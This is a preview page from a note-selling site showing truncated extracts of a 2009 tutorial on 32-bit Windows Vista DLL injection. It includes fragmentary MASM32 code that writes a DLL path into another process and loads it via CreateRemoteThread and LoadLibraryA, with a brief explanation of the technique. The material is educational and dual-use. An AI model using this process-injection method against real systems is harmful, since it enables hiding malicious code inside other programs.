Search for notes by fellow students, in your own course and all over the country.
Browse our notes for titles which look like what you need, you can preview any of the notes via a sample of the contents. After you're happy these are the notes you're after simply pop them into your shopping cart.
Title: Hacking
Description: It's a complete notes on Vista dll Injection of Ethical Hacking
Description: It's a complete notes on Vista dll Injection of Ethical Hacking
Document Preview
Extracts from the notes are below, to see the PDF you'll receive please use the links above
Title:
Win Vista DLL Injection (32bit)
Date:
January 25st 2009
Website:
http://www
...
com
Author:
Nicolaou George
Mail:
ishtus<\at>astalavista<\d0t>com
1
Table of Contents
Introduction
...
3
Code
...
8
ASLR and LoadLibrary
...
8
Finally
...
The sample code used is written in
assembly language (MASM32) using the WinAsm IDE
...
Tools
The tools used in this paper are the following:
- WinAsm Studio [http://www
...
net/]
Code
injectDLL
...
486
...
inc
...
if
uMsg == WM_COMMAND
...
elseif wParam == EXIT
invoke EndDialog,hWin,0
;////////////////////////////////////Open File Dialog//////////////////////////////////////////////////////////
...
lStructSize,SIZEOF ofn
mov ofn
...
lpstrFile,offset lib
mov ofn
...
Flags,OFN_FILEMUSTEXIST+OFN_PATHMUSTEXIST+OFN_LONGNAMES+OFN_EXPLORER+OFN_HIDEREADONLY
invoke GetOpenFileName,addr ofn
...
endif
;/////////////////////////////////////////////////////////////////////////////////////////////////////////////
...
elseif uMsg == WM_CLOSE
invoke EndDialog,hWin,0
...
if eax == 0
; If no PID inserted then use current process PID
invoke GetCurrentProcessId
...
endif
mov hProcId,eax
...
endif
invoke
OpenProcess,PROCESS_QUERY_INFORMATION+PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_
WRITE,0,hProcId ;Open process from PID
...
endif
mov hProcId,eax
;////Calculate bytes needed to allocate for library pathname/////////////
invoke lstrlen,addr lib
inc eax
mov libstrlen,eax
;///////////////////////////////////////////////////////////////////////
invoke VirtualAllocEx,hProcId,0,libstrlen,MEM_COMMIT,PAGE_READWRITE
...
endif
mov ipbase,eax
4
;Allocate memory to write dll pathname
invoke WriteProcessMemory,hProcId,ipbase,addr lib,libstrlen,0 ; Write dll pathname to allocated memory
...
endif
invoke GetModuleHandle,addr krn32
mov pfnRtn,eax
invoke GetProcAddress, pfnRtn,addr llib
...
endif
mov pfnRtn,eax
;Get address of kernel32 in memory (ASLR friendly)
;Get address if LoadLibraryA
invoke CreateRemoteThread,hProcId,NULL,0,pfnRtn,ipbase,0,NULL
LoadLibraryA
...
endif
Ret
InjectDll EndP
;a quick fix of masm32
...
while eax != 0
xor edx, edx
mov dl, byte ptr [edi]
sub dl, "0" ; subtrack each digit with "0" to convert it to hex value
mov esi, eax
dec esi
push eax
mov eax, edx
push ebx
mov ebx, 10
...
endw
5
;Create remote thread and load our dll using
pop ebx
add ecx, eax
pop eax
inc edi
dec eax
...
inc
include
windows
...
inc
include kernel32
...
inc
;------------------------------------------------------------------------------------------------------------------------includelib
user32
...
lib
includelib
comdlg32
...
data
krn32
db
"kernel32",0
llib
db
"LoadLibraryA",0
error0
db
"Error",0
; Open file dialog
6
strFilter db
"Dynamic Libraries (*
...
dll",0,"All Files",0,"*
...
data?
hInstance
dd
?
hProcId
HANDLE
?
libstrlen
dd
?
hProcIdb
db
5 dup(?)
lib
db
512 dup(?)
errormsg
db
512 dup(?)
;Open file dialog
ofn
OPENFILENAME <>
;------------------------------------------------------------------------------------------------------------------------injectDLL
...
",SELECT,"Button",0x50010000,133,23,21,13,0x00000000
END
7
Why Remote Thread?
The idea behind using a remote thread to inject a dynamic library is to create a new thread in a remote process that calls
the LoadLibrary API and load our DLL inside the address space of that remote thread
...
To overcome this problem we need to find the offset of
LoadLibrary inside the address space layout of our process
...
dll (which contains the LoadLibrary procedure) might change we
use GetModuleHandle to retrieve the address of LoadLibraryA which will be the same in the remote thread address
space
...
We
therefore have to call VirtualAllocEx to allocate memory in the remote process and therefore patch the pathname of the
DLL we intent to inject
...
Finally
When everything is done we can call the CreateRemoteThread and parse the arguments for injecting the DLL (see code)
...
The rest are up to you
enjoy
Title: Hacking
Description: It's a complete notes on Vista dll Injection of Ethical Hacking
Description: It's a complete notes on Vista dll Injection of Ethical Hacking